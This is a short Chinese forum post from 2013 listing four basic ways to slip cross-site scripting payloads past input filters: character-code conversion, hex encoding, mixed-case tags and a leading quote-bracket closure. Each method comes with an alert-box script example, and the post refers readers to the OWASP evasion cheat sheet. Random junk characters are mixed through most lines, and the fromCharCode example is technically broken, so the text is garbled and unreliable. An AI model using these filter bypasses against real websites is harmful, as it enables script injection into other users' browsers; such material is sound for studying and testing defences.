四种超级基础的绕过方法。6 }. E% L% h' l% V
1.转换为ASCII码1 Y8 R5 y8 q" X" A0 _0 D" y% ?; a
例子:原脚本为<script>alert(‘I love F4ck’)</script >: E, U8 N" U# ^. Z% G
通过转换,变成:
. D, W: p! O0 l& D. @<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>% {2 S+ l$ Q. b4 p- O1 ~
- q9 }7 a6 V, y, ^
2.转换为HEX(十六进制); G3 r+ W6 Z2 [4 p/ ~3 T2 f; ^
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 U2 h% Q+ L" X( f: M( i通过转换,变成:) @& r! j v3 m( ~0 t G
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
% ~& Z8 x! _" Q* v0 c" J4 D
9 @6 s9 p2 G4 J% V0 L& G3.转换脚本的大小写
5 c0 R$ E- ?7 N' G* a. ]% d) I& |例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 t3 u* v; G5 H( {+ r' K4 p转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>4 k) a% p' g, w) J
% R% z% \& p0 U, Q; q! Q; r4.增加闭合标记”>3 p; b( S6 ?; r) i2 j% m
例子:原脚本为<script>alert(‘I love F4ck’)</script>! i! J! |. E# G5 R9 V( I* B
转换为:”><script>alert(‘I love F4ck’)</script>
' s7 ~( H. u' ^( [9 R u0 F- H更详细绕过技术请参考此网页
9 g, d/ y% v# V1 D o3 Thttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet& q6 ~2 _0 }" b2 H8 p5 G
8 w a& Z! J$ ^0 C0 m# t: c; X9 ]- T转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对